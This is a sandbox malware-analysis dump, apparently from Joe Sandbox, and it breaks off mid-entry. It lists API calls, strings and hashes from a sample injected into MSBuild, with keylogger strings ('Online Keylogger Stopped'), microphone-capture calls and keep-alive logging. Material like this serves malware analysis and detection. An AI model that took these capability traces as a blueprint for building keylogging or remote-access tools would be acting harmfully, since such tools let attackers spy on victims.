                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                    • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                    • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                                      • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                                      • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                                                                    • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                    • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                    • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                    • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                                                    • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                    • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                                                    • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                    • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                    • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                    • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                                                                                                    • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                    • String ID: $fD
                                                                                                                                                                                    • API String ID: 1807457897-3092946448
                                                                                                                                                                                    • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                                                                    • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                                                                                                                      • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                                                                                                                      • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                                      • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                                    • API String ID: 1291196975-3785015651
                                                                                                                                                                                    • Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                                                                    • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                                                                                                                    • Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                    • API String ID: 0-711371036
                                                                                                                                                                                    • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                    • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                                                                      • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                    • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                                                                      • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                                      • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                    • String ID: image/png
                                                                                                                                                                                    • API String ID: 1291196975-2966254431
                                                                                                                                                                                    • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                                                                    • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                    • API String ID: 481472006-1507639952
                                                                                                                                                                                    • Opcode ID: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                                                                                    • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2e8fdc496267155201b16627e0203c98a38a6ed5fb5594af8cf6ec90a1053f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: : $Se.
                                                                                                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                    • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                    • API String ID: 481472006-2430845779
                                                                                                                                                                                    • Opcode ID: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                                                                                    • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                                                                    • Opcode Fuzzy Hash: d635f5de0eb30f12a53b303b4771e55d0759891efdf147d162576b96ad6faa0a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                                    • String ID: alarm.wav$xIG
                                                                                                                                                                                    • API String ID: 1174141254-4080756945
                                                                                                                                                                                    • Opcode ID: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                                                                    • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                      • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                    • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                    • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                      • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                                                    • Opcode ID: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                                                                                    • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02e0c4701129a9c42addc2d2970a81326eabfec1a0363ad7f570d4515b217cc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(00FE59E8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                                                    • waveInAddBuffer.WINMM(00FE59E8,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                    • String ID: T=G
                                                                                                                                                                                    • API String ID: 2315374483-379896819
                                                                                                                                                                                    • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                                                                    • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                                                    • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocaleValid
